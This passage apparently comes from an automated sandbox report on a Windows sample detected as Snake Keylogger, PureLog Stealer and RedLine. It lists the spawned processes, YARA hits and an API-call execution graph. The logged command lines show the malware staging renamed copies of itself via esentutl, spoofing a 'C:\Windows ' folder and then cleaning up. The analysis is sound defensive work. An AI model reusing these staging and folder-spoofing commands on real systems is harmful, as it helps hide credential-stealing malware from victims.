                                                                                                                Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\EPTMAcgvNZ.exe /d C:\\Users\\Public\\Libraries\\Cobsfhiy.PIF /o
                                                                                                                Imagebase:0x9c0000
                                                                                                                File size:352'768 bytes
                                                                                                                MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:13
                                                                                                                Start time:02:24:49
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:14
                                                                                                                Start time:02:24:49
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Imagebase:0x400000
                                                                                                                File size:68'096 bytes
                                                                                                                MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.2540746609.0000000027061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000002.2540746609.0000000027061000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000003.1357241369.0000000024219000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000003.1357241369.0000000024219000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.2536490412.00000000260EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.2536490412.0000000026535000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.2536490412.000000002615E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.2536490412.00000000262D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.2535779078.0000000025D2B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000002.2535779078.0000000025D2B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000E.00000002.2542354548.0000000028BE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.2542354548.0000000028BE0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000002.2542354548.0000000028BE0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000E.00000002.2542354548.0000000028BE0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.2536490412.0000000026276000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000E.00000002.2505613508.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.2536490412.00000000263C5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000E.00000002.2541431650.00000000285A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000E.00000002.2541431650.00000000285A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000002.2541431650.00000000285A0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000000E.00000002.2541431650.00000000285A0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.2536490412.00000000260FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000000E.00000002.2536490412.0000000026061000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 3%, ReversingLabs
                                                                                                                Reputation:moderate
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:15
                                                                                                                Start time:02:24:49
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                                                                                                                Imagebase:0x9c0000
                                                                                                                File size:352'768 bytes
                                                                                                                MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:moderate
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:16
                                                                                                                Start time:02:24:54
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\Public\alpha.pif
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                                                                                                                Imagebase:0x390000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:18
                                                                                                                Start time:02:24:56
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\Public\alpha.pif
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
                                                                                                                Imagebase:0x390000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:19
                                                                                                                Start time:02:24:57
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\Public\alpha.pif
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                                                                                                                Imagebase:0x390000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:20
                                                                                                                Start time:02:24:57
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\Public\xpha.pif
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                                                                                                                Imagebase:0x380000
                                                                                                                File size:18'944 bytes
                                                                                                                MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 0%, ReversingLabs
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:21
                                                                                                                Start time:02:24:59
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\Public\Libraries\Cobsfhiy.PIF
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\Public\Libraries\Cobsfhiy.PIF"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:1'297'920 bytes
                                                                                                                MD5 hash:DC614075998696B44ADA8A2EED23FC03
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:Borland Delphi
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Avira
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                • Detection: 63%, ReversingLabs
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:23
                                                                                                                Start time:02:25:00
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Imagebase:0x400000
                                                                                                                File size:68'096 bytes
                                                                                                                MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000017.00000002.2542721990.0000000034860000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000002.2542721990.0000000034860000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000017.00000002.2542721990.0000000034860000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000017.00000002.2542721990.0000000034860000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000003.1465818240.00000000327BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000017.00000003.1465818240.00000000327BE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000017.00000001.1460585249.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000017.00000002.2505730658.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000002.2540455156.000000003429B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000017.00000002.2540455156.000000003429B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.2542884762.0000000034B53000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000017.00000002.2542884762.0000000034A3E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.2542884762.0000000034A3E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.2542884762.0000000034AF4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000017.00000002.2542884762.0000000034951000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000002.2546648768.0000000035951000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000017.00000002.2546648768.0000000035951000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000017.00000002.2541674509.0000000034690000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000017.00000002.2541674509.0000000034690000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000017.00000002.2541674509.0000000034690000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000017.00000002.2541674509.0000000034690000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.2542884762.0000000034C23000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.2542884762.0000000034A76000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000017.00000002.2542884762.0000000034ADA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:24
                                                                                                                Start time:04:03:08
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\Public\Libraries\Cobsfhiy.PIF
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\Public\Libraries\Cobsfhiy.PIF"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:1'297'920 bytes
                                                                                                                MD5 hash:DC614075998696B44ADA8A2EED23FC03
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:Borland Delphi
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:26
                                                                                                                Start time:04:03:10
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\Public\Libraries\yihfsboC.pif
                                                                                                                Imagebase:0x400000
                                                                                                                File size:68'096 bytes
                                                                                                                MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000001A.00000002.2533591544.00000000289FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.2533591544.00000000289FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000002.2532622056.000000002859B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000001A.00000002.2532622056.000000002859B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000002.2537622019.0000000029911000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000001A.00000002.2537622019.0000000029911000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.2533591544.0000000028A96000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 0000001A.00000002.2533591544.0000000028911000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.2533591544.0000000028B11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001A.00000002.2505611445.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000001A.00000002.2538945311.000000002B4C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000002.2538945311.000000002B4C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000001A.00000002.2538945311.000000002B4C0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000001A.00000002.2538945311.000000002B4C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000003.1551837223.00000000268CE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000001A.00000003.1551837223.00000000268CE000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.2533591544.0000000028AB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000001A.00000001.1548998614.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000001A.00000002.2538166394.000000002AE90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000001A.00000002.2538166394.000000002AE90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000001A.00000002.2538166394.000000002AE90000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 0000001A.00000002.2538166394.000000002AE90000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.2533591544.0000000028A32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000001A.00000002.2533591544.0000000028BDF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:27
                                                                                                                Start time:04:03:12
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\Public\alpha.pif
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
                                                                                                                Imagebase:0x390000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:28
                                                                                                                Start time:04:03:17
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\Public\alpha.pif
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
                                                                                                                Imagebase:0x390000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:29
                                                                                                                Start time:04:03:17
                                                                                                                Start date:26/11/2024
                                                                                                                Path:C:\Users\Public\alpha.pif
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
                                                                                                                Imagebase:0x390000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Disassembly

                                                                                                                Reset < >

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:16.1%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:30.1%
                                                                                                                  Total number of Nodes:1649
                                                                                                                  Total number of Limit Nodes:19
                                                                                                                  execution_graph 32359 2b33e12 33917 2b14860 32359->33917 33918 2b14871 33917->33918 33919 2b14897 33918->33919 33920 2b148ae 33918->33920 33926 2b14bcc 33919->33926 33935 2b145a0 33920->33935 33923 2b148a4 33924 2b148df 33923->33924 33940 2b14530 33923->33940 33927 2b14bd9 33926->33927 33934 2b14c09 33926->33934 33928 2b14c02 33927->33928 33930 2b14be5 33927->33930 33931 2b145a0 11 API calls 33928->33931 33946 2b12c44 11 API calls 33930->33946 33931->33934 33932 2b14bf3 33932->33923 33947 2b144dc 33934->33947 33936 2b145a4 33935->33936 33937 2b145c8 33935->33937 33960 2b12c10 33936->33960 33937->33923 33939 2b145b1 33939->33923 33941 2b14534 33940->33941 33944 2b14544 33940->33944 33943 2b145a0 11 API calls 33941->33943 33941->33944 33942 2b14572 33942->33924 33943->33944 33944->33942 33945 2b12c2c 11 API calls 33944->33945 33945->33942 33946->33932 33948 2b144fd 33947->33948 33949 2b144e2 33947->33949 33948->33932 33949->33948 33951 2b12c2c 33949->33951 33952 2b12c3a 33951->33952 33954 2b12c30 33951->33954 33952->33948 33953 2b12d19 33959 2b12ce8 7 API calls 33953->33959 33954->33952 33954->33953 33958 2b16520 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 33954->33958 33957 2b12d3a 33957->33948 33958->33953 33959->33957 33961 2b12c27 33960->33961 33964 2b12c14 33960->33964 33961->33939 33962 2b12c1e 33962->33939 33963 2b12d19 33969 2b12ce8 7 API calls 33963->33969 33964->33962 33964->33963 33968 2b16520 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 33964->33968 33967 2b12d3a 33967->33939 33968->33963 33969->33967 33970 2b3c350 33973 2b2f7c8 33970->33973 33974 2b2f7d0 33973->33974 33974->33974 33975 2b2f7d7 33974->33975 36405 2b288b8 LoadLibraryW 33975->36405 33977 2b2f7f1 36410 2b12ee0 QueryPerformanceCounter 33977->36410 33979 2b2f7f6 33980 2b2f800 InetIsOffline 33979->33980 33981 2b2f80a 33980->33981 33982 2b2f81b 33980->33982 33983 2b14530 11 API calls 33981->33983 33984 2b14530 11 API calls 33982->33984 33985 2b2f819 33983->33985 33984->33985 33986 2b14860 11 API calls 33985->33986 33987 2b2f848 33986->33987 33988 2b2f850 33987->33988 33989 2b2f85a 33988->33989 36413 2b147ec 33989->36413 33991 2b2f873 33992 2b2f87b 33991->33992 33993 2b2f885 33992->33993 36428 2b289d0 33993->36428 33996 2b14860 11 API calls 33997 2b2f8ac 33996->33997 33998 2b2f8b4 33997->33998 33999 2b2f8be 33998->33999 34000 2b147ec 11 API calls 33999->34000 34001 2b2f8d7 34000->34001 34002 2b2f8df 34001->34002 34003 2b2f8e9 34002->34003 34004 2b289d0 20 API calls 34003->34004 34005 2b2f8f2 34004->34005 34006 2b14860 11 API calls 34005->34006 34007 2b2f910 34006->34007 34008 2b2f918 34007->34008 36441 2b146d4 34008->36441 36443 2b28274 36405->36443 36407 2b288f1 36454 2b27d78 36407->36454 36411 2b12ef8 GetTickCount 36410->36411 36412 2b12eed 36410->36412 36411->33979 36412->33979 36414 2b14851 36413->36414 36415 2b147f0 36413->36415 36416 2b14530 36415->36416 36417 2b147f8 36415->36417 36421 2b145a0 11 API calls 36416->36421 36423 2b14544 36416->36423 36417->36414 36418 2b14807 36417->36418 36420 2b14530 11 API calls 36417->36420 36422 2b145a0 11 API calls 36418->36422 36419 2b14572 36419->33991 36420->36418 36421->36423 36425 2b14821 36422->36425 36423->36419 36424 2b12c2c 11 API calls 36423->36424 36424->36419 36426 2b14530 11 API calls 36425->36426 36427 2b1484d 36426->36427 36427->33991 36429 2b289e4 36428->36429 36430 2b281cc 17 API calls 36429->36430 